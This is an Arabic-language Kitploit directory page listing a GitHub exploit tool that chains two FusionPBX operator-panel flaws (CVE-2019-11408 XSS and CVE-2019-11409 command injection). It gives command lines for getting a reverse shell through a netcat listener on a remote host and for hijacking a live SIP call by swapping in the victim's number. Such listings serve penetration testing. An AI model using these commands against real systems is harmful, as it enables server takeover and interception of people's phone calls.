Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fusionpbx_rce_vulnerability — سلسلة CVE-2019-11408 – XSS في لوحة المشغل و CVE-2019-11409 – حقن الأوامر في لوحة المشغل. | Kitploit
أدوات/GitHubGitHub/hoseynheydari/fusionpbx_rce_vulnerability
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubhoseynheydari/fusionpbx_rce_vulnerability

fusionpbx_rce_vulnerability

سلسلة CVE-2019-11408 – XSS في لوحة المشغل و CVE-2019-11409 – حقن الأوامر في لوحة المشغل.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

مقدمة

يحاول هذا الكود البسيط إكمال تنفيذ الثغرة المتسلسلة التي قدمها
Dustin Cobb
في مقال RCE Using Caller ID – Multiple Vulnerabilities In FusionPBX.

RCE

خطوات إعادة الإنتاج

  1. اعرض شاشة المشغل الضعيفة في متصفح ويب، والموجودة في هذا المثال على الرابط https://{fusionpbx_address}/app/operator_panel/index.php
  2. ابدأ مستمع netcat على نظام بعيد (rce_listener_address).
  3. شغّل كود الاستغلال أدناه على النظام البعيد في نافذة طرفية أخرى:
    python3 .\main.py --close_rce_sockets False --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --rce_listener_address {rce_listener_address}
  4. سيتصل الاستغلال بمستمع netcat ويوفر شل عكسية.

استبدال مكالمة

بينما نعرف Call-ID و from-tag و to-tag من مكالمة، سيؤدي تشغيل الكود أدناه إلى استبدالك مكان الضحية في المكالمة.

خطوات إعادة الإنتاج

  1. أولاً، ابدأ مكالمة بين واجهتي SIP UA.
  2. بعد إنشاء المكالمة، نحتاج إلى بناء dialog_identifier عن طريق دمج {Call-ID}{semicolon}"to-teg:"{to-tag}"from-tag"{from-tag}.
  3. شغّل كود الاختطاف أدناه على النظام البعيد واستبدل رقمك برقم الضحية:
    python3 .\transfer.py --attacker_address {attacker_address} --fusion_pbx_address {fusion_pbx_address} --victim_number {victim_number} --dialog_identifier {dialog_identifier}
تنزيل الأداة